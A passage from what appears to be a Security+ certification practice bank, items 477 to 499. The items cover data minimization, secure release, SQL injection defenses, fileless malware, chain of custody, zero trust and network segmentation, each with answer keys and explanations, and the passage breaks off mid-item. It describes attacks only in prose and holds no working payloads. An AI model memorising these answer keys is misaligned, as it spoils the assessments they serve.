Option B is correct because data minimization is a core security principle: you should only share the minimum necessary data for the task. By removing all fields the contractor does not need (e.g., Social Security numbers, addresses, salary data), you reduce the attack surface and limit exposure of sensitive personally identifiable information (PII) in case of a breach or misuse.

Exam trap

The trap here is that candidates confuse trust with security, assuming a trusted third party eliminates the need for data minimization, when in reality least privilege applies regardless of trust level.

How to eliminate wrong answers

Option A is wrong because trust does not eliminate risk; a trusted contractor could still have a compromised endpoint or accidentally expose the full file, violating the principle of least privilege. Option C is wrong because posting the file to a public collaboration site, even with a password, exposes it to cloud storage risks (e.g., misconfigured permissions, password sharing, or brute-force attacks) and violates data minimization. Option D is wrong because renaming the file does not remove sensitive data; it only obscures the filename, leaving all sensitive fields intact and accessible if the file is opened.

477
MCQmedium

A development team needs to release a security fix to a customer portal, but the change must not introduce a new outage or bypass review controls. Which practice best supports a secure and repeatable release?

A.Apply the change directly in production so users get the fix immediately
B.Use an approved pipeline with peer review, automated testing, and rollback steps
C.Skip testing because security fixes should always be deployed quickly
D.Let any on-call developer approve and deploy without documentation
AnswerB

An approved pipeline with review, testing, and rollback provides controlled delivery while reducing deployment and recovery risk.

Why this answer

Option B is correct because an approved pipeline with peer review, automated testing, and rollback steps ensures that the security fix is deployed in a controlled, repeatable manner. This approach prevents unauthorized changes, validates the fix through testing, and provides a safety net via rollback, directly addressing the requirement to avoid new outages and bypass review controls.

Exam trap

The trap here is that candidates may confuse 'speed' with 'security' and choose direct production deployment (Option A) or skipping testing (Option C), failing to recognize that a controlled pipeline with rollback is the only way to meet both the security and reliability requirements simultaneously.

How to eliminate wrong answers

Option A is wrong because applying the change directly in production bypasses all review and testing controls, violating the requirement to avoid outages and maintain oversight. Option C is wrong because skipping testing for security fixes increases the risk of introducing new vulnerabilities or breaking functionality, contradicting the need for a secure and repeatable release. Option D is wrong because allowing any on-call developer to approve and deploy without documentation eliminates peer review and traceability, undermining change management and audit requirements.

478
MCQmedium

A development team wants to allow users to search orders by customer name and date range. Logs show the team currently concatenates the filter values into SQL strings. Which change best reduces SQL injection risk without removing the search feature?

A.Escape apostrophes in the input before building the SQL statement.
B.Use parameterized queries or prepared statements for the search filters.
C.Disable database error messages so attackers cannot see query details.
D.Place the application behind a VPN so only internal users can run searches.
AnswerB

Parameterized queries separate code from data, so user input is treated as values rather than executable SQL. This allows the search function to remain flexible while dramatically reducing injection risk. Prepared statements are the preferred fix because they address the root cause instead of relying on brittle string handling.

Why this answer

Option B is correct because parameterized queries (also known as prepared statements) separate SQL logic from user data by sending the query structure and parameters independently to the database. This ensures that user-supplied filter values are always treated as data, never as executable SQL code, which completely prevents SQL injection even if the input contains malicious characters like apostrophes or SQL keywords.

Exam trap

The trap here is that candidates often choose input escaping (Option A) because it seems like a direct fix for the apostrophe problem, but they fail to recognize that parameterized queries are the only comprehensive defense that eliminates the entire class of SQL injection vulnerabilities regardless of input format.

How to eliminate wrong answers

Option A is wrong because escaping apostrophes alone does not protect against all SQL injection vectors, such as numeric fields, stacked queries, or time-based blind injection, and escaping can be bypassed if not done consistently or if the database uses a different escape character. Option C is wrong because disabling database error messages only hides error details from attackers; it does not prevent the injection itself, and an attacker can still exploit the vulnerability using blind SQL injection techniques. Option D is wrong because placing the application behind a VPN does not address the root cause of SQL injection; it only restricts network access, and the vulnerability remains exploitable by any authenticated user who can reach the application.

479
MCQhard

A finance laptop is opened to review an invoice attachment. EDR then shows winword.exe launching powershell.exe with hidden, no-profile, and base64-encoded arguments. No executable is written to disk, network beacons begin from memory, and after a reboot the activity disappears unless the document is opened again. What type of malware behavior is most likely?

A.Worm behavior, because the infection would self-replicate across systems through the network.
B.Fileless attack, because malicious code runs in memory and leaves little or no executable artifact on disk.
C.Rootkit behavior, because the malware is hidden from normal user-mode tools.
D.Ransomware, because the user opened an invoice attachment before the suspicious activity started.
AnswerB

This is a classic fileless attack pattern. The process chain from a trusted Office app to hidden PowerShell, the encoded command line, the lack of a new binary on disk, and the disappearance after reboot all point to code executing primarily in memory. That makes detection harder and often means the initial document or script acts as the launcher rather than a traditional dropper.

Why this answer

The scenario describes malicious code that executes entirely in memory without writing an executable to disk, which is the defining characteristic of a fileless attack. Winword.exe launching PowerShell with hidden, no-profile, and base64-encoded arguments is a classic technique to load and execute payloads directly in memory, bypassing traditional file-based detection. The fact that activity disappears after reboot unless the document is reopened confirms that no persistent artifact remains on disk, further supporting fileless behavior.

Exam trap

The trap here is that candidates may confuse the initial infection vector (opening an invoice) with the malware type (ransomware), but the key behavioral indicator is the in-memory execution and lack of disk artifacts, which points to fileless malware, not ransomware.

How to eliminate wrong answers

Option A is wrong because worm behavior requires self-replication across systems via network propagation, and there is no evidence of lateral movement or self-copying in this scenario. Option C is wrong because rootkit behavior involves hiding processes, files, or registry keys from the operating system, typically by intercepting system calls, whereas this attack runs in user-mode memory without hiding its presence from EDR. Option D is wrong because ransomware would typically encrypt files and demand payment, but the description only shows beaconing and no file encryption or ransom note, so the invoice attachment is merely the initial vector, not the malware type.

480
MCQmedium

Security receives a company-owned laptop connected to an insider theft investigation. Before the device is transported to the evidence locker, what is the BEST action to support chain of custody?

A.Factory reset the laptop so investigators can start from a clean system
B.Seal the device in an evidence bag and record each handoff with signatures
C.Remove the hard drive and image it without any documentation
D.Leave the laptop unlocked so the next analyst can inspect it quickly
AnswerB

Sealing and documented handoffs create a defensible custody record and reduce the chance of tampering.

Why this answer

Option B is correct because sealing the device in an evidence bag and recording each handoff with signatures establishes a documented, unbroken chain of custody. This ensures the integrity of the evidence by preventing tampering and providing a verifiable record of who handled the device and when, which is critical for admissibility in legal proceedings.

Exam trap

The trap here is that candidates may think a factory reset (Option A) helps investigators start clean, but it actually destroys evidence, while proper sealing and documentation (Option B) is the only method that preserves evidence integrity for legal proceedings.

How to eliminate wrong answers

Option A is wrong because factory resetting the laptop destroys all potential evidence, including files, logs, and metadata, making it impossible for investigators to recover data relevant to the theft. Option C is wrong because removing the hard drive and imaging it without documentation violates chain of custody principles, as there is no record of who performed the action or when, compromising evidence integrity. Option D is wrong because leaving the laptop unlocked risks unauthorized access, alteration, or deletion of evidence, breaking the chain of custody and potentially rendering the evidence inadmissible.

481
Multi-Selectmedium

A manufacturer wants partner-company users to access a procurement portal. The manufacturer does not want to create separate local accounts, and the partners want to authenticate their own users with existing corporate identities. Which two capabilities should be implemented? Select two.

Select 2 answers
A.Create a separate local account for every partner employee and store the passwords internally.
B.Trust the partner identity providers through federation and accept their assertions.
C.Use a shared generic partner login for each company to simplify support.
D.Map partner roles or groups to application permissions after authentication.
E.Require partners to email screenshots of their credentials to request access.
AnswersB, D

Federation lets the portal rely on partner identity systems instead of creating local passwords.

Why this answer

Option B is correct because federation allows the manufacturer to trust identity assertions from the partners' own identity providers (IdPs) using standards like SAML 2.0 or OIDC. This eliminates the need for local accounts while enabling partners to authenticate with their existing corporate identities, meeting both requirements.

Exam trap

The trap here is that candidates may confuse federation with role mapping (option D) as the primary solution, but federation is the core capability for external authentication, while role mapping is a separate authorization step that occurs after authentication.

482
Multi-Selecthard

A development team signs branch-router firmware before deployment. The same code-signing private key is stored on two build servers, and a compromise of either server would let an attacker sign malicious updates that look legitimate. Which two changes best reduce the cryptographic risk while preserving the ability to sign trusted releases? Select two.

Select 2 answers
A.Move the signing private key into a non-exportable hardware security module or managed key service.
B.Use separate signing keys for each product line or release environment to limit blast radius.
C.Encrypt the build server disks with full-disk encryption so the private key stays protected.
D.Store the private key in a read-only artifact repository so all build agents can access it.
E.Replace the signing process with file hashes and checksums to verify release integrity.
AnswersA, B

Keeping the signing key in an HSM or managed key service prevents attackers from copying it off the server. If the build host is compromised, the attacker still cannot easily extract the private key. That preserves trusted signing while materially reducing the chance of key theft and unauthorized firmware signing.

Why this answer

Option A is correct because moving the private key into a non-exportable hardware security module (HSM) or managed key service ensures the key material never resides on the build servers in a form that can be extracted. Even if a build server is compromised, the attacker cannot steal the private key to sign malicious firmware. This directly addresses the risk of key exposure from server compromise while preserving the ability to sign trusted releases through secure API calls to the HSM.

Exam trap

CompTIA often tests the misconception that full-disk encryption (Option C) is sufficient to protect keys in use, when in reality it only protects data at rest and does nothing to prevent key extraction from a compromised running system.

483
MCQhard

A web portal for customer refunds checks device health at sign-in, then re-checks the device and user context before each refund over a threshold. A session that started on a managed laptop is blocked when the laptop later fails posture checks, even though the password remains valid. Which principle is best illustrated?

A.Defense in depth
B.Zero trust
C.Least privilege
D.Need-to-know
AnswerB

The portal does not trust the session simply because the user authenticated once. It repeatedly evaluates device posture and context before granting sensitive actions, and it can deny access when risk changes. That is the core of zero trust: verify explicitly, assume no persistent trust, and re-evaluate access continuously instead of relying on an initial login event.

Why this answer

The scenario describes a system that continuously verifies trust—checking device health at sign-in and re-evaluating both device and user context before each high-value action—and blocks access even when the password is valid. This is the core of Zero Trust: 'never trust, always verify,' where authentication and authorization are re-assessed at every transaction, not just at session start. The policy enforces access decisions based on real-time posture (e.g., device compliance, user behavior) rather than relying solely on a static credential.

Exam trap

The trap here is that candidates confuse 'Zero Trust' with 'defense in depth' because both involve multiple security layers, but Zero Trust specifically mandates continuous re-validation of trust for each access request, not just layered static controls.

How to eliminate wrong answers

Option A is wrong because defense in depth is a layered security strategy (e.g., firewall + antivirus + IDS) that does not specifically require continuous re-verification of device health within a single session; this scenario is about dynamic trust decisions, not multiple independent controls. Option C is wrong because least privilege limits user permissions to the minimum needed for their role (e.g., read-only access), but it does not address re-checking device posture or blocking a session mid-stream based on health changes. Option D is wrong because need-to-know restricts access to data based on a user's specific job requirement, not on device compliance or continuous authentication; it is about data classification, not session-level trust revocation.

484
MCQmedium

A records manager learns that emails related to a harassment investigation are scheduled for deletion next week under the retention policy. Legal issues a hold because the case may go to court. What should the records manager do?

A.Delete the emails after creating a summary report
B.Archive the emails permanently in the same mailbox
C.Suspend deletion until the legal hold is lifted
D.Anonymize the sender names and keep the messages
AnswerC

A legal hold overrides routine retention schedules, so deletion must stop until the matter is resolved.

Why this answer

A legal hold overrides standard retention policies because it preserves electronically stored information (ESI) that may be relevant to litigation. The records manager must immediately suspend deletion to avoid spoliation, which could result in legal sanctions. This aligns with the eDiscovery process and the duty to preserve evidence once litigation is reasonably anticipated.

Exam trap

CompTIA often tests the distinction between retention policies (which automate deletion based on time) and legal holds (which override those policies to preserve evidence), and the trap here is assuming that a summary report or anonymization satisfies legal preservation requirements when only a full suspension of deletion is acceptable.

How to eliminate wrong answers

Option A is wrong because deleting the emails after creating a summary report destroys the original ESI, which may be required as native evidence in court; a summary is not a substitute for the original messages. Option B is wrong because archiving emails permanently in the same mailbox does not prevent them from being overwritten or altered by normal mailbox operations, and it does not implement a proper legal hold that preserves the data in a forensically sound manner. Option D is wrong because anonymizing sender names alters the evidence, potentially destroying metadata and context needed for the investigation and violating the integrity of the ESI under legal hold requirements.

485
MCQmedium

A security manager at a healthcare organization is responsible for maintaining the information security policy. A project manager requests a policy exception to use a cloud-based analytics platform that stores patient data. The platform currently encrypts data at rest with AES-128 instead of the required AES-256. The security manager assesses the risk and determines that the likelihood of data exposure is low due to other compensating controls already in place, but the impact would be high. The residual risk is within the organization's risk appetite. Which of the following is the most appropriate action for the security manager to take?

A.Deny the exception and require the project to use an approved platform that meets the AES-256 requirement.
B.Approve the exception and document the compensating controls and a review date.
C.Accept the risk and allow the project to proceed without a formal exception.
D.Escalate the request to the chief information officer for a final decision.
AnswerB

This is correct because a formal exception process with documented compensating controls and a scheduled review ensures that the risk is managed, tracked, and reassessed over time. This aligns with security program management best practices.

Why this answer

Option B is correct because the security manager has assessed the risk, determined that compensating controls reduce the likelihood of data exposure, and confirmed that the residual risk is within the organization's risk appetite. Formally approving the exception with documented compensating controls and a review date ensures governance, accountability, and a timeline for reassessment, which aligns with the policy exception process in security program management.

Exam trap

The trap here is that candidates may assume any deviation from policy must be denied (Option A) or escalated (Option D), failing to recognize that a formal exception process with compensating controls and a review date is the correct risk-based action when residual risk is within appetite.

How to eliminate wrong answers

Option A is wrong because it ignores the risk assessment showing low likelihood and acceptable residual risk; a blanket denial without considering compensating controls is overly rigid and not risk-based. Option C is wrong because accepting the risk without a formal exception bypasses the policy exception process, leaving the deviation undocumented and unmonitored, which violates audit and compliance requirements. Option D is wrong because the security manager has the authority to approve exceptions within the risk appetite; escalating unnecessarily delays the project and abdicates the manager's responsibility for risk decisions.

486
MCQmedium

Based on the exhibit, what vulnerability is the application most likely suffering from?

A.Stored cross-site scripting, because attacker-controlled script is saved and later rendered to other users.
B.Command injection, because the script attempts to send cookies to a remote host.
C.Session fixation, because users saw the same review page after posting.
D.Insecure deserialization, because the payload is embedded in a review field.
AnswerA

Stored cross-site scripting is correct because the malicious script was submitted once, saved by the application, and then executed for other visitors when the review was displayed. The evidence of requests to the attacker domain confirms that the browser executed the injected script and exposed user data.

Why this answer

The application stores user-supplied input in a review field and later renders it to other users without proper sanitization. The exhibit shows a script tag attempting to exfiltrate cookies to a remote host, which is a classic stored cross-site scripting (XSS) payload. Because the malicious script is persisted on the server and executed in the browsers of subsequent visitors, the vulnerability is stored XSS.

Exam trap

CompTIA often tests the distinction between stored XSS and reflected XSS, where candidates may confuse the persistence of the payload (stored) with the immediate reflection of input (reflected), or they may incorrectly associate cookie exfiltration with command injection rather than client-side scripting.

How to eliminate wrong answers

Option B is wrong because command injection involves injecting operating system commands into a server-side process (e.g., via shell metacharacters like `;` or `|`), not sending cookies via JavaScript; the script's behavior of exfiltrating cookies is a client-side action, not server-side command execution. Option C is wrong because session fixation requires an attacker to force a known session ID on a user before login, and the scenario describes a review page being displayed after posting, which is unrelated to session ID manipulation. Option D is wrong because insecure deserialization exploits the deserialization of untrusted data objects (e.g., PHP or Java serialized objects) to execute arbitrary code, whereas the payload here is a simple script tag embedded in a text field, not a serialized object.

487
MCQeasy

A company is considering a new SaaS vendor that will process customer records. What is the best first action before signing the contract?

A.Perform vendor due diligence and review the vendor's security controls
B.Allow the vendor access immediately and monitor for misuse afterward
C.Ask the vendor to send a marketing brochure and pricing sheet only
D.Wait until a security incident occurs before reviewing the vendor
AnswerA

Before onboarding a vendor that will handle sensitive records, the organization should evaluate the vendor's security posture, contractual terms, and control maturity.

Why this answer

Performing vendor due diligence and reviewing the vendor's security controls is the best first action because it proactively assesses the SaaS vendor's ability to protect customer records before any data is shared. This aligns with the principle of 'trust but verify' and ensures that the vendor's security posture meets the company's compliance requirements (e.g., GDPR, HIPAA) and risk tolerance before signing a legally binding contract.

Exam trap

The trap here is that candidates may think 'allowing access immediately and monitoring' is acceptable due to a false sense of security from logging tools, but CompTIA tests that proactive due diligence is mandatory before any data sharing, as monitoring alone cannot prevent contractual or compliance violations.

How to eliminate wrong answers

Option B is wrong because allowing immediate access without prior security review violates the principle of least privilege and exposes customer records to potential data breaches or unauthorized use, with no contractual safeguards in place. Option C is wrong because a marketing brochure and pricing sheet provide no technical or operational details about the vendor's security controls, encryption standards, or incident response capabilities, making it impossible to assess risk. Option D is wrong because waiting for a security incident before reviewing the vendor is a reactive, high-risk approach that could lead to regulatory fines, reputational damage, and legal liability for compromised customer data.

488
Multi-Selecteasy

A security team receives a suspicious email attachment and wants to inspect its behavior safely before any user opens it. They also want a tool that can isolate the same threat if it reaches an endpoint. Which two tools or capabilities best fit this need? Select two.

Select 2 answers
A.EDR remote isolation capability on the endpoint.
B.Sandboxing the attachment before release to users.
C.DLP monitoring to prevent accidental data leakage.
D.A WAF filtering web requests to the application.
E.Port mirroring on a switch for traffic review.
AnswersA, B

EDR can isolate the host while preserving its state for later investigation.

Why this answer

A is correct because EDR remote isolation capability allows the security team to immediately disconnect an endpoint from the network if the suspicious attachment is executed, preventing lateral movement and data exfiltration. B is correct because sandboxing the attachment before release to users provides a safe, isolated environment to analyze the file's behavior without risking the production network. Together, these tools address both proactive analysis (sandbox) and reactive containment (EDR isolation).

Exam trap

The trap here is that candidates may confuse DLP's data loss prevention role with threat analysis or endpoint containment, overlooking that DLP does not execute files or isolate systems.

489
Multi-Selectmedium

The legal team wants to confirm that customer records are being deleted on schedule after the retention period expires. Which two artifacts best demonstrate compliance? Select two.

Select 2 answers
A.An approved retention schedule or retention policy that defines the deletion period.
B.A folder of employee social media posts about data cleanup.
C.System or audit logs showing the deletion job ran successfully.
D.A list of all printers in the office environment.
E.A draft policy from last year that was never approved.
AnswersA, C

A retention schedule establishes the rule the organization is supposed to follow. Without it, there is no clear basis for deciding when records should be deleted.

Why this answer

Option A is correct because an approved retention schedule or policy is the authoritative document that defines the required deletion period for customer records. It serves as the legal mandate against which compliance is measured. Option C is correct because system or audit logs provide verifiable evidence that the deletion job executed successfully, confirming that the policy was actually followed.

Together, these two artifacts demonstrate both the requirement (policy) and the execution (logs) needed to prove compliance.

Exam trap

The trap here is that candidates may confuse a draft or unapproved policy (Option E) with an approved one, or mistakenly think that informal evidence like social media posts (Option B) can substitute for authoritative documentation and verifiable logs.

490
Multi-Selecthard

After a phishing simulation, many employees still almost entered credentials into a fake login page. Leadership wants the fastest improvement without creating training fatigue or disrupting daily work. Which three measures are the best balance of security and usability? Select three.

Select 3 answers
A.Provide targeted microtraining only to users who clicked or nearly clicked.
B.Add a one-click report-phish button and acknowledge employee reports quickly.
C.Use just-in-time warning banners or link-check prompts when users follow external login pages.
D.Replace email access with a weekly manual approval queue for all messages.
E.Publicly identify the worst performers in team meetings to discourage mistakes.
AnswersA, B, C

Targeted coaching addresses the observed behavior without forcing unnecessary training on the entire workforce.

Why this answer

Option A is correct because targeted microtraining focuses only on the users who demonstrated risky behavior (clicking or nearly clicking), which directly addresses the root cause without wasting time on users who did not engage. This approach avoids training fatigue by keeping content brief and relevant, and it does not disrupt daily work for the majority of employees who already exhibit secure behavior.

Exam trap

The trap here is that candidates may confuse 'fastest improvement' with 'most aggressive technical control' (like option D) or 'public shaming' (like option E), failing to recognize that behavioral change through targeted, low-friction interventions (microtraining, reporting, and just-in-time prompts) yields faster and more sustainable results without alienating users.

491
MCQmedium

A public website is overwhelmed by a flood of DNS responses arriving from many open resolvers after the attacker sends small forged queries to those resolvers. The target bandwidth is saturated and the source IPs vary widely. What kind of attack is being used?

A.SYN flood
B.DNS amplification DDoS
C.Replay attack
D.Man-in-the-middle attack
AnswerB

DNS amplification uses small spoofed requests to trigger much larger replies from reflectors, multiplying traffic toward the victim.

Why this answer

B is correct because this scenario describes a DNS amplification DDoS attack. The attacker sends small forged DNS queries with a spoofed source IP (the victim's IP) to open resolvers, which respond with much larger DNS replies. The flood of amplified responses saturates the victim's bandwidth, and the varying source IPs make mitigation difficult.

This matches the description of a reflection/amplification attack using DNS.

Exam trap

The trap here is confusing a DNS amplification attack with a SYN flood because both involve flooding, but the key differentiator is the use of DNS responses from open resolvers versus incomplete TCP handshakes.

How to eliminate wrong answers

Option A is wrong because a SYN flood targets the TCP three-way handshake by sending many SYN packets without completing the handshake, exhausting server resources; it does not involve DNS responses or open resolvers. Option C is wrong because a replay attack involves capturing and retransmitting valid data transmissions (e.g., authentication tokens) to trick a system; it does not use DNS queries or bandwidth saturation.

492
MCQmedium

A company wants all corporate laptops to authenticate to Wi-Fi using device certificates instead of shared passwords. It also wants to deny network access to systems that do not meet the baseline requirement for disk encryption and current endpoint protection. Which approach best satisfies both goals?

A.Use a single WPA2-Personal passphrase and email it to all employees.
B.Deploy 802.1X with certificate-based authentication and network access control posture checks.
C.Allow any device to join and rely on antivirus scans after users log in.
D.Use MAC address filtering and a captive portal for all internal Wi-Fi users.
AnswerB

802.1X with certificates verifies device identity, and NAC posture assessment can block noncompliant endpoints.

Why this answer

802.1X with certificate-based authentication ensures that only devices with valid certificates can authenticate to the Wi-Fi network, eliminating reliance on shared passwords. Network access control (NAC) posture checks then evaluate each device against baseline requirements (e.g., disk encryption, current endpoint protection) and deny access to non-compliant systems. This combination directly satisfies both goals of certificate-only authentication and conditional access based on security posture.

Exam trap

The trap here is that candidates often confuse 802.1X with simple certificate authentication and overlook the NAC posture check component, assuming that certificate-based authentication alone meets the baseline requirement, but the question explicitly requires denying access to non-compliant systems, which only NAC can enforce.

How to eliminate wrong answers

Option A is wrong because WPA2-Personal uses a single shared passphrase, which does not enforce device-specific authentication or posture checks, and emailing the passphrase to all employees introduces a security risk. Option C is wrong because allowing any device to join and relying on post-login antivirus scans does not prevent non-compliant devices from accessing the network initially, violating the requirement to deny access to systems that do not meet baseline requirements. Option D is wrong because MAC address filtering can be spoofed and does not verify device certificates or security posture, and a captive portal typically only controls web access after connection, not the initial network authentication or compliance checks.

493
MCQeasy

Based on the exhibit, what should the security team recommend before sharing the report?

A.Share the report exactly as requested, because the vendor signed a nondisclosure agreement.
B.Remove unnecessary personal fields and share only the minimum data needed for the analysis.
C.Keep all fields and encrypt the file before sending it to the vendor.
D.Store the report in a shared folder so the vendor can access it later if needed.
AnswerB

This is the correct privacy-by-design response because the vendor only needs department-level trends. The organization should minimize the data shared, especially sensitive or unnecessary fields like home addresses and medical leave codes. Limiting the dataset reduces privacy risk, supports compliance, and follows the principle of collecting and disclosing only what is needed for the stated business purpose.

Why this answer

Option B is correct because the principle of data minimization requires that only the minimum necessary data be shared to fulfill the analysis purpose. Removing unnecessary personal fields reduces the risk of exposing PII and aligns with privacy regulations such as GDPR and HIPAA, even when a nondisclosure agreement (NDA) is in place.

Exam trap

CompTIA often tests the misconception that a signed NDA or encryption alone is sufficient to share sensitive data, when in fact data minimization and least privilege are the primary security controls required.

How to eliminate wrong answers

Option A is wrong because an NDA does not justify sharing all data fields; it only provides a legal framework for confidentiality, not a technical safeguard against data exposure or misuse. Option C is wrong because encrypting the file protects data in transit but does not address the core issue of sharing unnecessary personal fields; encryption alone does not comply with data minimization principles. Option D is wrong because storing the report in a shared folder introduces additional access control risks and does not limit the data shared to only what is needed for analysis, violating the principle of least privilege.

494
MCQmedium

An online ticketing system must survive a single server failure and continue operating after a primary site outage. The business wants the lowest-cost design that still improves availability. Which architecture is best?

A.Deploy active-active servers across multiple regions with load balancing.
B.Use an active-passive design with replicated data and automatic failover to a secondary site.
C.Schedule nightly backups and restore only after the outage is confirmed.
D.Add RAID to the server to protect against all availability failures.
AnswerB

Active-passive redundancy balances cost and resilience by keeping a standby environment ready for server or site failure.

Why this answer

An active-passive design with replicated data and automatic failover (Option B) meets the requirement of surviving a single server failure and a primary site outage while minimizing cost. Unlike active-active, it uses standby resources that only activate during failover, reducing operational expense. This architecture improves availability without the complexity and cost of multi-region active-active deployment.

Exam trap

The trap here is that candidates often choose active-active (Option A) because it offers the highest availability, but they overlook the explicit 'lowest-cost' constraint, which makes the cheaper active-passive design the correct answer despite its slightly longer failover time.

How to eliminate wrong answers

Option A is wrong because deploying active-active servers across multiple regions with load balancing provides high availability but at significantly higher cost due to redundant active infrastructure in multiple geographic locations, which exceeds the 'lowest-cost' requirement. Option C is wrong because nightly backups with restore only after outage confirmation does not provide continuous availability; it results in significant downtime (potentially hours or days) and data loss (up to 24 hours of transactions), failing the 'continue operating' requirement. Option D is wrong because RAID protects only against local disk failures, not against server failure (e.g., motherboard, power supply) or site outage (e.g., power loss, network cut), so it does not meet the survivability requirement.

495
MCQmedium

A hospital is redesigning its wireless network. Guest devices must reach only the internet. Staff laptops need access to internal applications. Medical devices must communicate with a monitoring server but never with guest devices or the broader employee LAN. What design best meets these goals with the least operational complexity?

A.Place all devices on one flat network and rely on endpoint antivirus for protection.
B.Create separate VLANs for guest, staff, and medical devices, then enforce traffic rules between them with firewall policies.
C.Use a single wireless SSID with client isolation enabled and NAT all traffic through one gateway.
D.Deploy network access control only at login time and allow all devices onto the same internal subnet afterward.
AnswerB

This approach provides clean segmentation while keeping administration manageable. Separate VLANs define distinct trust zones, and firewall policies or ACLs control exactly which services can cross boundaries. That lets guest traffic stay internet-only, staff reach approved internal apps, and medical devices communicate only with the monitoring server.

Why this answer

Option B is correct because VLANs logically segment the network into isolated broadcast domains for guest, staff, and medical devices, while firewall policies (e.g., using ACLs or stateful inspection) enforce granular traffic rules. This design ensures medical devices can only communicate with the monitoring server, guests are restricted to internet-only access, and staff can reach internal applications, all without requiring complex physical reconfiguration.

Exam trap

The trap here is that candidates may choose client isolation (Option C) thinking it provides security, but it breaks required device-to-server communication and does not enforce role-based access, whereas VLANs with firewall policies offer precise, scalable segmentation.

How to eliminate wrong answers

Option A is wrong because a flat network with only endpoint antivirus provides no network-level segmentation, allowing guest devices to potentially access staff or medical systems, violating isolation requirements. Option C is wrong because a single SSID with client isolation prevents all device-to-device communication, which would block legitimate traffic between medical devices and the monitoring server, and NAT alone does not enforce access controls between device groups. Option D is wrong because network access control only at login time (e.g., 802.1X authentication) does not enforce ongoing traffic restrictions; after authentication, all devices share the same subnet, allowing unauthorized communication between guest, staff, and medical devices.

496
MCQmedium

A security analyst detects an encrypted outbound connection from a web server to an unknown IP address. The connection is persistent and occurs every 5 minutes. What is the MOST appropriate first step for the analyst to take?

A.Disconnect the server from the network immediately.
B.Block the IP address at the perimeter firewall.
C.Review the server's process list and logs to identify the source.
D.Escalate the incident to the incident response team.
AnswerC

This is the correct first step. By examining the process list and logs (e.g., system, firewall, and application logs), the analyst can determine the specific process or service responsible for the outbound connection, assess whether it is malicious, and gather evidence for further investigation or escalation.

Why this answer

Option C is correct because the first step in investigating an unknown encrypted outbound connection is to identify the process or service responsible for initiating it. Reviewing the server's process list and logs allows the analyst to determine whether the connection is legitimate (e.g., a scheduled update or backup) or malicious (e.g., a beacon from implanted malware). Without this visibility, actions like blocking or disconnecting could disrupt legitimate services or alert an attacker prematurely.

Exam trap

The trap here is that candidates often jump to containment (disconnect or block) without first performing local analysis, failing to recognize that the initial step in incident response is always identification and scoping before containment.

How to eliminate wrong answers

Option A is wrong because immediately disconnecting the server from the network is an aggressive containment step that should only be taken after confirming malicious activity; it can cause unnecessary downtime and data loss if the connection is benign. Option B is wrong because blocking the IP address at the perimeter firewall is a reactive measure that does not address the root cause—the unknown process on the server—and the attacker could simply use a different IP or domain. Option D is wrong because escalation to the incident response team is premature before gathering initial evidence; the analyst should first perform local investigation to confirm the nature of the connection and collect relevant data for a proper handoff.

497
Multi-Selecthard

An investigator receives a suspect laptop that may be needed in court. The goal is to create a forensic image without changing the original drive contents. Which three actions best support chain of custody and evidence integrity? Select three.

Select 3 answers
A.Use a hardware write blocker during acquisition so the original disk cannot be modified.
B.Record cryptographic hash values for both the original media and the forensic image.
C.Document every transfer of the laptop, including who had custody, when, and why.
D.Browse the original disk using the operating system file explorer to confirm the case folder is present.
E.Store the suspect drive and the forensic copy in the same unlocked folder to simplify access.
AnswersA, B, C

A write blocker prevents accidental or intentional writes to the original media during imaging. That is one of the most important controls for protecting evidence integrity. It helps show that the original drive remained unchanged while the forensic image was created.

Why this answer

A hardware write blocker is essential because it physically prevents any write commands from reaching the suspect drive at the SATA/IDE or USB level, ensuring the original disk's contents remain unaltered during acquisition. This is a foundational requirement for maintaining evidence integrity in forensic imaging, as any modification could render the evidence inadmissible in court.

Exam trap

The trap here is that candidates may think browsing the original disk is harmless or that storing evidence together is convenient, but both actions violate core forensic principles of preserving original evidence and maintaining a clear chain of custody.

498
MCQmedium

A company can patch only one of two internet-facing systems this week. System 1 has a critical vulnerability but is reachable only through the corporate VPN during maintenance windows. System 2 has a medium vulnerability and supports the public payment site, which shows active attack traffic every day. Which system should be prioritized first?

A.System 1, because the vulnerability is rated critical
B.System 2, because it is exposed to the public and directly supports a business-critical service
C.Neither system, because both are internet-facing and must wait for the next maintenance cycle
D.System 1, because VPN access always makes a vulnerability more dangerous than a public application issue
AnswerB

System 2 should be patched first because risk depends on both exposure and business impact. A medium issue on a public payment site with active attacks presents a higher real-world risk than a critical issue on a system with narrower access. The payment service is also directly tied to revenue and customer trust, so delaying its remediation would create greater business exposure.

Why this answer

System 2 should be prioritized because it is directly exposed to the public internet and supports a business-critical payment service that is under active attack daily. Even though System 1 has a critical vulnerability, it is only reachable through the corporate VPN during maintenance windows, which significantly reduces its attack surface and exploitability. In risk management, the likelihood of exploitation and business impact often outweigh the CVSS base score alone, making System 2 the higher priority.

Exam trap

The trap here is that candidates fixate on the CVSS critical rating (System 1) and ignore the crucial context of attack surface and active threat, leading them to choose A instead of applying risk-based prioritization.

How to eliminate wrong answers

Option A is wrong because it focuses solely on the CVSS severity rating (critical) without considering the reduced attack surface due to VPN-only access, which lowers the actual risk. Option C is wrong because delaying patching for both systems ignores the immediate threat to the public-facing payment service under active attack, violating the principle of prioritizing based on risk and business impact. Option D is wrong because VPN access does not inherently make a vulnerability more dangerous; in fact, it restricts the attack vector to authenticated users, whereas a public-facing system is exposed to the entire internet, including automated attack traffic.

499
MCQmedium

An organization is redesigning its office network. Guest Wi-Fi must reach the internet only, employee laptops need access to internal apps, and a payment-processing system must be separated from general user traffic but still reach one database server. Which design best meets these requirements?

A.Place all devices on one flat network and rely on host firewalls for isolation.
B.Create separate VLANs or subnets for guest, user, and payment zones, then filter inter-zone traffic with firewalls or ACLs.
C.Put the payment system in a DMZ and allow direct internet access for database synchronization.
D.Use NAT on every endpoint so internal devices cannot be individually identified on the network.
AnswerB

Separate zones with internal filtering limit lateral movement and allow only required flows.

Why this answer

Option B is correct because it uses VLANs or subnets to segment guest, employee, and payment-processing traffic into separate broadcast domains, then applies firewall rules or ACLs to control inter-zone traffic. This allows guest Wi-Fi to be restricted to internet-only access, employee laptops to reach internal apps, and the payment system to communicate only with its specific database server while being isolated from general user traffic.

Exam trap

The trap here is that candidates often think a DMZ is always the correct answer for any sensitive system, but in this scenario, the payment system needs controlled access to an internal database, not internet exposure, making VLAN segmentation with firewalls the proper design.

How to eliminate wrong answers

